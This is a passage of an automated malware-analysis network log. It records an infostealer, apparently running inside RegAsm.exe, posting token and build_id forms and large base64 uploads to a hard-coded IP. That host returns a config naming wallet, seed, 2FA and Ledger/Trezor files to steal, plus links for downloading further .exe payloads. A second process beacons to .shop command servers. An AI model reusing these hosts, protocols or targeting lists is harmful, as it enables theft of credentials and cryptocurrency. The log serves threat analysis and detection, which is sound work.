33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 0d 0a 43 6f 6e 74 Data Ascii: ------KECGDBFCBKFIDHIDHDHIContent-Disposition: form-data; name="token"66a71a0d37978e6db5aece12523e11b3------KECGDBFCBKFIDHIDHDHIContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------KECGDBFCBKFIDHIDHDHICont
2024-09-26 23:49:42 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:49:42 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49730	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:43 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFHJJDHJEGHJKECBGCF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:43 UTC	461	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 37 31 61 30 64 33 37 39 37 38 65 36 64 62 35 61 65 63 65 31 32 35 32 33 65 31 31 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 0d 0a 43 6f 6e 74 Data Ascii: ------KKFHJJDHJEGHJKECBGCFContent-Disposition: form-data; name="token"66a71a0d37978e6db5aece12523e11b3------KKFHJJDHJEGHJKECBGCFContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------KKFHJJDHJEGHJKECBGCFCont
2024-09-26 23:49:44 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:49:44 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	49731	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:45 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGHIIDHCGHCAAAAAFIJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 130993 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:45 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 37 31 61 30 64 33 37 39 37 38 65 36 64 62 35 61 65 63 65 31 32 35 32 33 65 31 31 62 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------GCGHIIDHCGHCAAAAAFIJContent-Disposition: form-data; name="token"66a71a0d37978e6db5aece12523e11b3------GCGHIIDHCGHCAAAAAFIJContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------GCGHIIDHCGHCAAAAAFIJCont
2024-09-26 23:49:45 UTC	16355	OUT	Data Raw: 59 4f 73 65 46 39 4e 75 74 4d 75 39 63 74 62 75 63 6c 6c 61 62 61 32 4d 5a 37 6a 47 41 52 67 35 47 4f 31 64 72 45 35 4d 4a 56 6c 5a 54 47 34 58 44 64 65 32 50 30 49 72 41 31 5a 42 42 62 65 49 59 59 38 69 4e 37 52 4c 67 72 32 44 74 35 69 73 52 39 64 67 2f 48 4a 37 31 36 65 42 2f 32 61 73 6e 53 30 76 6f 7a 6c 7a 43 6e 44 46 34 65 58 74 59 70 75 4b 76 2b 68 35 58 52 52 52 58 33 5a 2b 61 42 51 61 4b 4b 41 45 72 30 58 34 61 66 38 65 6d 6f 2f 77 43 2b 6e 38 6a 58 6e 65 4b 39 44 2b 47 6e 2f 48 72 71 50 2b 2f 48 2f 4a 71 38 7a 4e 76 39 32 66 71 6a 32 63 69 2f 33 74 65 6a 4f 6f 2f 34 53 54 51 76 2b 67 31 70 33 2f 67 55 6e 2b 4e 4a 2f 77 41 4a 4a 6f 58 2f 41 45 47 74 4f 2f 38 41 41 70 50 38 61 70 57 57 71 32 75 69 2b 42 4e 4f 76 72 74 39 73 55 64 6a 44 77 4f 72 48 Data Ascii: YOseF9NutMu9ctbucllaba2MZ7jGARg5GO1drE5MJVlZTG4XDde2P0IrA1ZBBbeIYY8iN7RLgr2Dt5isR9dg/HJ716eB/2asnS0vozlzCnDF4eXtYpuKv+h5XRRRX3Z+aBQaKKAEr0X4af8emo/wC+n8jXneK9D+Gn/HrqP+/H/Jq8zNv92fqj2ci/3tejOo/4STQv+g1p3/gUn+NJ/wAJJoX/AEGtO/8AApP8apWWq2ui+BNOvrt9sUdjDwOrH
2024-09-26 23:49:45 UTC	16355	OUT	Data Raw: 4b 58 74 52 54 47 4a 52 51 61 4b 41 45 6f 70 61 4b 64 77 45 6f 6f 78 53 59 6f 4b 46 7a 69 6e 43 51 39 2b 52 37 30 79 69 6d 4b 79 48 2f 75 32 36 72 6a 33 46 4e 38 6b 48 37 72 2f 41 49 47 6b 6f 6f 73 68 36 6a 47 69 64 65 6f 70 6c 57 41 35 48 65 6c 4c 68 76 76 4b 44 53 73 50 6d 5a 57 6f 71 63 78 78 74 30 4a 48 31 70 6a 51 50 2f 44 38 77 39 71 56 69 6c 4a 45 5a 70 44 30 70 53 43 4f 6f 78 52 7a 51 4e 44 61 4b 57 6b 4e 41 78 4b 4b 57 69 6d 4d 53 6b 70 61 4b 41 75 4a 53 55 74 46 41 78 76 4e 4c 7a 52 51 61 42 69 47 6b 70 61 53 67 61 44 46 4a 53 30 47 6d 41 68 46 4e 70 31 47 4b 42 6a 52 51 61 58 69 6b 6f 47 49 61 54 74 54 71 54 46 49 59 33 46 4a 2b 46 4f 49 70 4f 39 4f 77 78 43 4f 4b 54 2f 50 53 6c 78 53 6d 69 77 30 4d 49 78 53 55 2b 6d 30 44 45 50 4e 42 70 61 54 Data Ascii: KXtRTGJRQaKAEopaKdwEooxSYoKFzinCQ9+R70yimKyH/u26rj3FN8kH7r/AIGkoosh6jGideoplWA5HelLhvvKDSsPmZWoqcxxt0JH1pjQP/D8w9qVilJEZpD0pSCOoxRzQNDaKWkNAxKKWimMSkpaKAuJSUtFAxvNLzRQaBiGkpaSgaDFJS0GmAhFNp1GKBjRQaXikoGIaTtTqTFIY3FJ+FOIpO9OwxCOKT/PSlxSmiw0MIxSU+m0DEPNBpaT
2024-09-26 23:49:45 UTC	16355	OUT	Data Raw: 53 4a 75 42 77 71 75 36 35 37 68 71 6d 6a 6b 6e 68 76 72 79 38 6c 30 74 35 47 75 72 78 4a 76 4c 6a 6e 4b 69 4f 49 45 35 69 42 39 43 75 31 63 39 74 76 46 4c 44 31 63 59 71 6e 4e 56 54 35 66 78 2f 72 58 38 42 34 75 6a 6c 7a 70 4f 4e 43 53 35 76 36 2f 79 2f 45 31 36 54 46 55 72 53 61 65 55 52 4c 4a 61 53 51 46 41 77 64 6d 6b 4c 65 59 53 78 49 4f 44 30 77 43 42 37 34 7a 56 30 64 4b 39 69 6e 50 6e 6a 65 31 6a 35 2b 72 54 39 6e 4c 6c 75 6e 36 42 52 52 52 56 6d 59 47 6b 70 54 53 55 41 46 46 46 46 41 78 4f 61 57 69 69 67 41 70 4d 55 74 46 41 43 55 55 55 55 44 43 6b 70 61 4b 41 45 6f 6f 6f 6f 41 4b 53 67 30 55 78 68 52 52 52 54 41 4b 4b 4b 4f 39 41 43 55 55 74 4a 53 47 46 4a 53 30 55 77 45 6f 6f 4e 46 41 42 53 55 74 47 4b 42 69 55 6c 4f 70 4b 41 45 6f 70 63 55 6d Data Ascii: SJuBwqu657hqmjknhvry8l0t5GurxJvLjnKiOIE5iB9Cu1c9tvFLD1cYqnNVT5fx/rX8B4ujlzpONCS5v6/y/E16TFUrSaeURLJaSQFAwdmkLeYSxIOD0wCB74zV0dK9inPnje1j5+rT9nLlun6BRRRVmYGkpTSUAFFFFAxOaWiigApMUtFACUUUUDCkpaKAEooooAKSg0UxhRRRTAKKKO9ACUUtJSGFJS0UwEooNFABSUtGKBiUlOpKAEopcUm
2024-09-26 23:49:45 UTC	16355	OUT	Data Raw: 35 2f 43 6b 37 5a 70 54 2f 41 4a 4e 4a 32 36 56 44 5a 53 47 30 68 47 42 30 70 61 4b 51 78 75 61 4f 31 4c 54 63 30 68 69 30 33 33 70 54 53 47 6b 4e 43 47 6b 2b 74 4b 51 63 2b 76 70 53 64 4b 52 51 6d 50 58 70 52 32 6f 2f 43 67 39 44 51 4e 48 6f 46 46 47 4b 4b 77 50 6b 7a 30 4b 33 6a 6a 62 53 72 4c 64 46 45 33 37 70 50 76 32 4c 79 2f 77 4a 33 48 38 2f 77 37 56 77 48 6a 6c 73 65 4d 4c 38 65 30 58 2f 41 4b 4b 53 76 52 62 4f 43 57 54 53 62 45 70 48 75 2f 63 6f 66 2b 50 71 53 50 38 41 67 58 2b 36 50 62 70 2b 50 63 31 35 74 34 39 4f 50 47 64 2b 50 61 4c 2f 41 4e 46 4a 58 7a 57 54 36 31 33 36 66 71 6a 37 2f 4f 4e 4b 43 39 66 30 5a 7a 6a 4e 58 70 66 67 53 50 7a 66 42 55 79 2b 58 35 6e 2f 41 42 4d 57 4f 50 4c 33 2f 77 44 4c 4e 65 33 6c 76 2f 4c 38 66 58 7a 47 76 54 Data Ascii: 5/Ck7ZpT/AJNJ26VDZSG0hGB0paKQxuaO1LTc0hi033pTSGkNCGk+tKQc+vpSdKRQmPXpR2o/Cg9DQNHoFFGKKwPkz0K3jjbSrLdFE37pPv2Ly/wJ3H8/w7VwHjlseML8e0X/AKKSvRbOCWTSbEpHu/cof+PqSP8AgX+6Pbp+Pc15t49OPGd+PaL/ANFJXzWT6136fqj7/ONKC9f0ZzjNXpfgSPzfBUy+X5n/ABMWOPL3/wDLNe3lv/L8fXzGvT
2024-09-26 23:49:45 UTC	16355	OUT	Data Raw: 54 79 37 65 37 6b 2b 30 65 57 57 38 76 43 73 41 67 59 5a 42 56 63 6c 65 52 67 35 4c 7a 71 46 37 4b 6c 77 4a 34 62 51 7a 79 32 4c 53 57 37 57 30 43 49 54 4a 47 52 4a 6a 43 67 44 6c 41 34 34 47 54 6b 64 65 4b 63 63 78 68 4e 4f 61 6a 38 4f 2f 6c 75 76 30 4a 6e 6b 74 57 6d 31 54 63 2f 69 32 58 66 52 50 58 37 2f 4d 32 4b 4b 79 59 37 72 37 56 72 6b 2b 6c 75 69 4b 74 76 71 4f 6e 32 44 79 49 4d 4f 35 61 4f 5a 70 51 47 78 6e 4a 63 59 2f 42 66 53 6f 48 31 32 36 76 39 44 31 43 65 34 74 37 4b 33 43 32 72 33 4d 48 32 65 42 55 61 46 6b 49 77 70 59 41 46 67 51 64 76 7a 45 6e 4a 48 65 6e 48 4d 34 53 76 5a 62 66 6b 4f 65 51 31 59 4f 4d 5a 53 56 35 57 74 36 39 6a 64 6f 72 43 75 4e 54 59 58 33 69 71 4e 59 59 31 46 72 72 4d 4e 76 44 68 51 4e 69 45 7a 5a 41 39 42 38 6f 34 48 Data Ascii: Ty7e7k+0eWW8vCsAgYZBVcleRg5LzqF7KlwJ4bQzy2LSW7W0CITJGRJjCgDlA44GTkdeKccxhNOaj8O/luv0JnktWm1Tc/i2XfRPX7/M2KKyY7r7Vrk+luiKtvqOn2DyIMO5aOZpQGxnJcY/BfSoH126v9D1Ce4t7K3C2r3MH2eBUaFkIwpYAFgQdvzEnJHenHM4SvZbfkOeQ1YOMZSV5Wt69jdorCuNTYX3iqNYY1FrrMNvDhQNiEzZA9B8o4H
2024-09-26 23:49:45 UTC	16355	OUT	Data Raw: 30 47 6c 36 43 6b 4d 53 6b 4a 70 66 65 6b 7a 51 55 67 39 61 54 4f 61 57 6b 50 4e 41 42 30 70 44 6a 30 37 30 74 49 54 2b 6c 41 78 4d 30 45 55 55 6d 61 59 30 47 61 51 43 6c 2f 53 6b 70 44 41 59 78 37 55 6d 61 55 39 4b 54 4e 41 77 48 41 39 71 54 33 70 65 61 54 50 2b 54 54 41 4f 76 30 39 36 51 35 78 30 70 54 31 36 30 68 4e 49 59 6e 31 6f 70 65 74 4a 31 37 55 78 69 48 72 52 30 36 63 66 53 6c 2b 6c 4a 33 2f 41 4d 4b 42 6e 6f 6c 46 46 46 5a 6e 79 49 55 56 6f 36 4e 70 4c 61 78 64 79 57 36 79 69 4d 70 47 5a 4d 6c 63 35 77 51 4d 64 66 65 74 54 2f 68 45 69 47 4b 74 65 45 45 64 51 59 76 2f 41 4b 39 65 62 69 73 32 77 65 45 6e 37 4f 74 4f 7a 39 47 2f 79 52 36 57 46 79 6a 47 34 75 6e 37 53 6a 43 36 39 55 76 7a 5a 7a 56 46 64 51 50 42 2b 66 38 41 6c 2f 38 41 2f 49 50 2f Data Ascii: 0Gl6CkMSkJpfekzQUg9aTOaWkPNAB0pDj070tIT+lAxM0EUUmaY0GaQCl/SkpDAYx7UmaU9KTNAwHA9qT3peaTP+TTAOv096Q5x0pT160hNIYn1opetJ17UxiHrR06cfSl+lJ3/AMKBnolFFFZnyIUVo6NpLaxdyW6yiMpGZMlc5wQMdfetT/hEiGKteEEdQYv/AK9ebis2weEn7OtOz9G/yR6WFyjG4un7SjC69UvzZzVFdQPB+f8Al/8A/IP/
2024-09-26 23:49:45 UTC	16355	OUT	Data Raw: 75 4d 67 65 54 4a 47 79 76 6b 39 50 6c 49 7a 7a 54 70 6f 35 62 61 63 51 58 4d 4d 30 45 70 58 63 45 6d 6a 5a 47 49 39 63 45 44 69 68 54 69 39 6e 75 4a 30 71 69 75 33 46 36 65 51 32 69 69 6b 5a 67 71 6c 6d 4f 41 4f 70 71 79 42 31 56 37 2b 46 72 69 79 6b 69 54 37 78 41 78 2b 42 7a 56 79 65 32 75 62 56 34 68 63 32 6c 31 43 5a 6d 43 52 43 53 42 31 38 78 6a 30 43 35 48 4a 2b 6c 51 6c 38 47 52 63 4e 75 69 79 5a 42 74 4f 55 77 63 48 64 36 63 38 63 31 68 56 56 4b 74 54 6c 54 62 30 61 61 65 76 66 51 37 4d 4c 50 45 59 50 45 55 38 52 43 50 76 51 61 6b 72 72 71 6e 64 66 6b 64 74 62 66 45 2b 7a 38 68 50 74 65 6b 36 6b 73 34 47 48 45 4d 53 73 75 65 2b 43 57 48 46 52 53 2b 50 50 44 63 31 70 4c 61 53 2b 48 72 36 53 32 6d 63 76 4a 43 39 6c 47 55 64 69 32 34 6b 72 75 77 53 Data Ascii: uMgeTJGyvk9PlIzzTpo5bacQXMM0EpXcEmjZGI9cEDihTi9nuJ0qiu3F6eQ2iikZgqlmOAOpqyB1V7+FriykiT7xAx+BzVye2ubV4hc2l1CZmCRCSB18xj0C5HJ+lQl8GRcNuiyZBtOUwcHd6c8c1hVVKtTlTb0aaevfQ7MLPEYPEU8RCPvQakrrqndfkdtbfE+z8hPtek6ks4GHEMSsue+CWHFRS+PPDc1pLaS+Hr6S2mcvJC9lGUdi24kruwS
2024-09-26 23:49:45 UTC	153	OUT	Data Raw: 58 4c 75 41 77 2b 36 79 4d 53 53 6a 41 39 78 31 42 49 50 57 75 57 6f 6f 73 42 30 47 6f 65 4e 2f 45 75 6f 2b 66 48 4a 72 56 37 46 61 7a 4b 59 7a 5a 32 38 37 78 32 36 78 6b 59 38 74 59 77 64 6f 58 48 47 4d 64 4b 35 2b 69 69 6d 41 56 63 6b 2f 35 41 74 72 2f 41 4e 66 45 33 2f 6f 4d 64 55 36 75 53 66 38 41 49 46 74 66 2b 76 69 62 2f 77 42 42 6a 6f 41 2f 2f 39 6b 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 2d 2d 0d 0a Data Ascii: XLuAw+6yMSSjA9x1BIPWuWoosB0GoeN/Euo+fHJrV7FazKYzZ287x26xkY8tYwdoXHGMdK5+iimAVck/5Atr/ANfE3/oMdU6uSf8AIFtf+vib/wBBjoA//9k=------GCGHIIDHCGHCAAAAAFIJ--
2024-09-26 23:49:46 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:49:46 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	49733	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:47 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKFCFBAAEHCFHJJKEHJK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:47 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 43 46 42 41 41 45 48 43 46 48 4a 4a 4b 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 37 31 61 30 64 33 37 39 37 38 65 36 64 62 35 61 65 63 65 31 32 35 32 33 65 31 31 62 33 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 43 46 42 41 41 45 48 43 46 48 4a 4a 4b 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 43 46 42 41 41 45 48 43 46 48 4a 4a 4b 45 48 4a 4b 0d 0a 43 6f 6e 74 Data Ascii: ------AKFCFBAAEHCFHJJKEHJKContent-Disposition: form-data; name="token"66a71a0d37978e6db5aece12523e11b3------AKFCFBAAEHCFHJJKEHJKContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------AKFCFBAAEHCFHJJKEHJKCont
2024-09-26 23:49:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:49:48 UTC	280	IN	Data Raw: 31 30 63 0d 0a 4d 54 49 79 4d 6a 45 30 4f 58 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 77 63 6d 39 6e 4c 7a 59 32 5a 6a 56 6b 59 6d 46 6a 59 54 4d 30 59 57 4e 66 62 47 5a 6b 62 6e 4e 68 5a 6d 35 6b 63 79 35 6c 65 47 56 38 4d 58 78 72 61 32 74 72 66 44 45 79 4d 6a 49 78 4e 54 42 38 61 48 52 30 63 44 6f 76 4c 7a 45 30 4e 79 34 30 4e 53 34 30 4e 43 34 78 4d 44 51 76 63 48 4a 76 5a 79 38 32 4e 6d 59 31 5a 47 49 35 5a 54 55 30 4e 7a 6b 30 58 33 5a 6d 61 32 46 6e 61 33 4d 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 78 4d 6a 49 79 4d 54 55 78 66 47 68 30 64 48 41 36 4c 79 38 78 4e 44 63 75 4e 44 55 75 4e 44 51 75 4d 54 41 30 4c 33 42 79 62 32 63 76 4e 6a 5a 6d 4e 57 52 6c 4e 7a 4a 6b 4f 57 56 69 5a 46 39 79 5a 48 Data Ascii: 10cMTIyMjE0OXxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9wcm9nLzY2ZjVkYmFjYTM0YWNfbGZkbnNhZm5kcy5leGV8MXxra2trfDEyMjIxNTB8aHR0cDovLzE0Ny40NS40NC4xMDQvcHJvZy82NmY1ZGI5ZTU0Nzk0X3Zma2Fna3MuZXhlfDF8a2tra3wxMjIyMTUxfGh0dHA6Ly8xNDcuNDUuNDQuMTA0L3Byb2cvNjZmNWRlNzJkOWViZF9yZH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	49735	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:50 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEBFIEBAFCBAAAAKJKJE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:50 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 46 49 45 42 41 46 43 42 41 41 41 41 4b 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 37 31 61 30 64 33 37 39 37 38 65 36 64 62 35 61 65 63 65 31 32 35 32 33 65 31 31 62 33 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 49 45 42 41 46 43 42 41 41 41 41 4b 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 49 45 42 41 46 43 42 41 41 41 41 4b 4a 4b 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------IEBFIEBAFCBAAAAKJKJEContent-Disposition: form-data; name="token"66a71a0d37978e6db5aece12523e11b3------IEBFIEBAFCBAAAAKJKJEContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------IEBFIEBAFCBAAAAKJKJECont
2024-09-26 23:49:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:49:51 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	49736	104.21.36.139	443	5040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:50 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: wallkedsleeoi.shop
2024-09-26 23:49:50 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 23:49:51 UTC	778	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:49:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=206n1sr669m1g97dpq3ghaif0r; expires=Mon, 20 Jan 2025 17:36:29 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VvoIprHdb5UKE0KAt%2FVDQZONYyK4CP1tYk0fnnW2dgM7dNCjTJRBbPuwO7yC2BEe%2B%2FmdVo%2FfWNRnjatq3oatHwGwf%2Bi0bStgwR3VKSdWAmGuDk%2BkymFwhGbEym4rAvM6cAiMtvk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9727209ad019aa-EWR
2024-09-26 23:49:51 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:49:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	49737	172.67.132.32	443	5040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:51 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gutterydhowi.shop
2024-09-26 23:49:51 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
